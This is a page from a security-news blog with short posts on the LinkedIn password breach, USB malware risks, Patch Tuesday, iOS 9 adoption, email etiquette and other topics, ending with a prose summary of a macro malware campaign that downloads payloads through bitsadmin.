Security Protection – Harry Waldron MVP Rotating Header Image

LinkedIn – All users encouraged to reset passwords

LinkedIn is notifying all users to change passwords as an attack 4 years ago was much broader in scope than initially thought.  This is always a beneficial process periodically for any online website where an account or membership exists.

http://money.cnn.com/2016/05/19/technology/linkedin-hack/

LinkedIn was hacked four years ago, and what initially seemed to be a theft of 6.5 million passwords has actually turned out to be a breach of 117 million passwords.  On Wednesday, the professional social network company acknowledged that a massive batch of login credentials is being sold on the black market by hackers. The worst part about it is that, because people tend to reuse their passwords, hackers are more likely to gain access to 117 million people’s email and bank accounts. The advice for everyone who uses LinkedIn at this point is: Change your password and add something called two-factor authentication, which requires a text message every time you sign in from a new computer.

 

Hi Harry,

To make sure you continue having the best experience possible on LinkedIn, we’re regularly monitoring our site and the Internet to keep your account information safe. We’ve recently noticed a potential risk to your LinkedIn account coming from outside LinkedIn. Just to be safe, you’ll need to reset your password the next time you log in.

Here’s how:

1.Go to the LinkedIn website.
2.Next to the password field, click the “Forgot your password” link, and enter your email address.
3.You’ll get an email from LinkedIn asking you to click a link that will help you reset your password.
4.Once you’ve reset your password, a confirmation email will be sent to the confirmed email addresses on your account.
 
Thanks for helping us keep your account safe,
The LinkedIn Team

EMAIL – Best practices for corporate email etiquette in 2016

The following are key considerations for composing or answering email in a corporate setting.  A few of these themes were covered in webinar, plus some were added from personal experiences:

* Keep messages short and simple where possible

* Formulate a clear, concise message that gets readers attention and ultimately generates results

* Convey a professional image through the email you send

* Project communication savvy through action words

* Make idea lists first as a rough outline

* Determine goals & audience & setting

* Get to the point by using strong subject lines, openings and closings

* Structure your message with strong opening and “punch line” closing

* Maintain a professional tone by recognizing what is appropriate communications

* Polish your email with a professional style for yourself and your organization

* Graphics, small screenshots, and highlighting key text in the message is helpful

* Identify tone and emotional issues before sending

* Look for spelling or grammar errors prior to sending

* It is helpful to also read from the recipient’s viewpoint

* Double check your message one last time before sending recognizing it is a “permanent record” that cannot be taken back or erased easily

Malware – USB media safety and trust factors for 2016

Two key takeaways from article highlight dangers associated with  (1) plugging your own USB device into another already infected computer or (2) finding and later using USB device of unknown origin (that might also be potentially infected).

http://www.pcworld.com/article/3070048/security/how-to-keep-usb-thumb-drive-malware-away-from-your-pc.html

Maybe you know not to plug strange USB drives into your computer, but trends indicate that most people think nothing of it. This is not a new risk. A decade ago, a group of penetration testers—hackers who are paid to break into companies, a la Sneakers—dropped 20 USB sticks around the parking lot of a credit union. Fifteen of them were found by employees, and each of those was eventually plugged into a computer, unwittingly running a program that communicated with a “bad” server.

In a recent and more rigorous experiment, a group of researchers from the University of Illinois Urbana-Champaign, University of Michigan and Google, dropped nearly 300 USB thumb drives around six campus locations and found that at least 45 percent of them were plugged into a computer and perused by the person who found them. While some of the people made an attempt to check the drive for malware—scanning it with antivirus software, for example—very few seemingly understood the risk of using an untrusted USB drive.

USB drives: Untrusted and ubiquitous — “In the current world, there is no advice, except to know the provenance of the USB drive,” Bailey said. “Do not trust, don’t plug or insert untrusted media into your computer.” For anyone tempted by the relative ubiquity of USB drives, this is hard advice to take. Security services provider Verizon, which publishes the annual data breach report, recommends that companies attempt to keep track of whenever USB drives are used. When the company finds untrusted USB drives, it can test them, said Chris Novak, a director with the firm’s RISK team, a computer investigations group.

Encrypted USB drives offer additional safety — When buying a drive, picking one with hardware encryption is also a good step. More advanced drives do not solve the basic problem of being a vector for malware, but they can protect the data on the drive and prevent firmware-based attacks such as BadUSB, according to Andrew Ewing, Flash Business Unit manager at storage-maker Kingston.

RECOMMENDATION — So, next time someone gives you a free USB drive, return it. If you find one on the ground, turn it in to lost-and-found. Plugging it into your computer is the worst digital hygiene, said Verizon’s Novak. “Think of USB sticks like toothbrushes and then you will not be so quick to pick it up and share it,” he says. (Ew.)

ISP – 2016 Satisfaction Survey by PC Magazine

Internet Service Providers are evaluated in the 2016 Satisfaction Survey by PC Magazine link below:

http://www.pcmag.com/article/344519/readers-choice-awards-2016-internet-service-providers

Readers’ Choice survey looks at your level of satisfaction with several aspects of the service including speed. Satisfaction is based on survey respondents’ perceptions rather than raw data and can be influenced by other factors including cost. For instance, a respondent may be very pleased with his connection speed, not because it’s so fast but because it feels appropriately fast for the price paid. On the other hand, there are respondents for whom speed is speed, and they won’t be satisfied unless their connection is blazingly fast, no matter the cost.

Respondents expressed dissatisfaction like never before with ISPs at the bottom of the pack. While our award winners’ ratings moved little from 2015, this year, the three lowest rated ISPs—Verizon DSL, Windstream DSL, and Frontier DSL—all had overall satisfaction ratings below 5.0, a threshold no provider fell below last year. Frontier’s rating of 3.8 can only be described as atrocious.

IBM – PCM is major advancement in memory technology

IBM engineers have created Phase Change Memory (PCM) which may represent a revolutionary step in meeting future storage needs on both a reliable and economic basis.

http://www.prnewswire.com/news-releases/ibm-scientists-achieve-storage-memory-breakthrough-300269117.html

ZURICH, May 17, 2016 /PRNewswire/ — For the first time, scientists at IBM (NYSE: IBM) Research have demonstrated reliably storing 3 bits of data per cell using a relatively new memory technology known as phase-change memory (PCM).

The current memory landscape spans from venerable DRAM to hard disk drives to ubiquitous flash. But in the last several years PCM has attracted the industry’s attention as a potential universal memory technology based on its combination of read/write speed, endurance, non-volatility and density. For example, PCM doesn’t lose data when powered off, unlike DRAM, and the technology can endure at least 10 million write cycles, compared to an average flash USB stick, which tops out at 3,000 write cycles.

IBM scientists envision standalone PCM as well as hybrid applications, which combine PCM and flash storage together, with PCM as an extremely fast cache. For example, a mobile phone’s operating system could be stored in PCM, enabling the phone to launch in a few seconds. In the enterprise space, entire databases could be stored in PCM for blazing fast query processing for time-critical online applications, such as financial transactions.

How PCM Works — PCM materials exhibit two stable states, the amorphous (without a clearly defined structure) and crystalline (with structure) phases, of low and high electrical conductivity, respectively. To store a ‘0’ or a ‘1’, known as bits, on a PCM cell, a high or medium electrical current is applied to the material. A ‘0’ can be programmed to be written in the amorphous phase or a ‘1’ in the crystalline phase, or vice versa. Then to read the bit back, a low voltage is applied. This is how re-writable Blue-ray Discs* store videos.

“Phase change memory is the first instantiation of a universal memory with properties of both DRAM and flash, thus answering one of the grand challenges of our industry,” said Dr. Haris Pozidis, an author of the paper and the manager of non-volatile memory research at IBM Research – Zurich. “Reaching 3 bits per cell is a significant milestone because at this density the cost of PCM will be significantly less than DRAM and closer to flash.”

Leadership – Five Techniques for Getting Started

John Maxwell shares five key lessons learned from his earliest experiences that are helpful for all leaders.

http://www.johnmaxwell.com/blog/5-lessons-i-learned-when-just-starting-out

There are many leaders who face similar circumstances to the ones I faced with a small organization and few resources, but big dreams and goals. Being a one-man show isn’t ideal, but it can teach you a lot of great leadership lessons. Here are five lessons I learned:

1. Harness the energy of potential — Every day presented a first for me and my career. Because of this, I was able to wake up each day excited for what lay ahead of me. The key is disciplining yourself to look for it in every situation.

2. Tap into your imagination — It’s often easy to say, “Well, no one has ever done that before” and give up. But when you tap into your imagination, you can find your way around any problem—and possibly help other people find their way around it too!

3. Discover your strengths and focus on them — I soon discovered that there were areas where I seemed to be growing quickly, like communication, and others where I grew much more slowly, such as administration. I worked at both, but I never became a great administrator. Over time, however, my communication got better and better.

4. Learn to build momentum — It’s tempting to believe success comes in the form of a “home run”. You can become convinced that you are one big this, or one lucky that, away from really breaking out. The truth is your breakout will come from the small changes you make day after day.  Consistent work to improve your routine, your disciplines, and your knowledge accumulates over time, and produces the big this or the “luck” that you need.

5. Appreciate those who help — Everyone has people who support and help them on their way, and I was no different.

Apple iOS 9 – Over 80 Percent of users staying up-to-date

Apple recently published statistics documenting a high rate of user adoption for the latest version 9 of iOS. As long as equipment and software environments are compatible, users often benefit with both improved security and functionality by staying on latest editions of operating systems. 

http://www.pcmag.com/news/344504/ios-9-adoption-rate-tops-80-percent

Apple’s iOS 9, which achieved the fastest iOS adoption rate ever in the days following its September 2015 release, is now installed on 84 percent of Apple’s mobile devices as of May 9, according to Apple’s developer website. Adoption of iOS 8 is at 11 percent, while earlier OSes are running on 5 percent of devices.

Users have long been keen to keep their iPhones and iPads up to date, but crossing the 80 percent mark for a single OS version is an important step as Apple gears up to release iOS 10. The company is expected to pull back the curtain on iOS 10 at its Worldwide Developers Conference next month and make it available in September.

Apple iOS 9 adoption numbers are also an indication of how quickly users are upgrading their devices. The operating system is compatible with phones as old as the iPhone 4s, as well as third-generation and newer iPads and fifth-generation or newer iPod touches. It’s also an improvement upon the adoption trajectory of its predecessor, iOS 8. Numerous bugs slowed iOS 8’s initial adoption, though it eventually reached 85 percent of Apple devices.

Microsoft Security Updates – MAY 2016

Below are key resources documenting this recent monthly Microsoft Patch Tuesday release:

https://technet.microsoft.com/en-us/library/security/ms16-may.aspx

https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+May+2016/21039/

https://isc.sans.edu/mspatchdays.html?viewday=2016-05-10

http://blog.talosintel.com/2016/05/ms-tuesday.html

Patch Tuesday for May 2016 has arrived where Microsoft releases their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release contains 16 bulletins addressing 33 vulnerabilities. Eight bulletins are rated critical, addressing vulnerabilities in Edge, Internet Explorer, Office, Graphic Components, VBScript, and Windows Shell. The remaining bulletins are rated important and address vulnerabilities in Internet Explorer, Office, Windows Kernel, IIS, Media Center, Hyper-V, .NET, and several other Windows components.

IT Professionals – Techniques for difficult Job Interviews

While HR managers are better trained for interviewing prospective professionals, others who may interview candidates can ask inappropriate or awkward questions.  Some techniques are noted in Forbes article below that can be helpful:

http://www.forbes.com/sites/lizryan/2016/05/05/how-to-answer-rude-and-unprofessional-interview-questions/

A job-seeker has to be ready for anything. You can get to a job interview and have a wonderful conversation, or you can get there and sit in a dingy lobby for forty minutes while they try to find someone to talk to you.

Let’s get a few things straight. A job interview is not a date. It is not a police interrogation. You are an interviewer, not my financial advisor. You are not my therapist. It is none of your business what I earned last year or what my personal five-year plan might be, if I have one.

Only someone who’s in a close personal relationship with me or my therapist gets to ask me what I’m working on in my personal life. That is none of an interviewer’s business, obviously. So many of us grew up drinking the toxic corporate lemonade that we have lost sight of the fact that people get to have boundaries. That is their right, and we were brought up to treat people respectfully.

The reason so many interviewers are so rude to job-seekers is that they have subscribed to the religion that employers are mighty and job-seekers are ants. Most of us have bought into that myth at some point. We think it’s normal for a person who isn’t paying you, isn’t your banker and has never met you before to ask you what you earned at your job last year.

Malware – W2KM_DLOADR.OTO Microsoft BITS used to download payloads

The Internet Storm Center (SANS) reports a new malicious macro-based Word document targeting users in Turkey.  Instead of using the Office based XMLHTTP process, the Microsoft BITS ADMIN command-line facility is utilized to download malicious agents onto the infected PC: 

https://isc.sans.edu/forums/diary/Microsoft+BITS+Used+to+Download

A few day ago, I found an interesting malicious Word document. First of all, the file has a very low score on VT: 2/56 (analysis is available here). The document is a classic one: Once opened, it asks the victim to enable macro execution if not yet enabled. The document targets Turkish people.  This is the interesting part. Instead of using a classic Microsoft XMLHTTP object, the macro download the payload via the tool Bitsadmin. Bitsadmin is a command line tool used to create download or upload jobs and monitor their progress. It is available by default since Windows 7 or Windows Server 2008 R2. “BITS” stands for “Background Intelligent Transfer Service”.

Featuring WPMU Bloglist Widget by YD WordPress Developer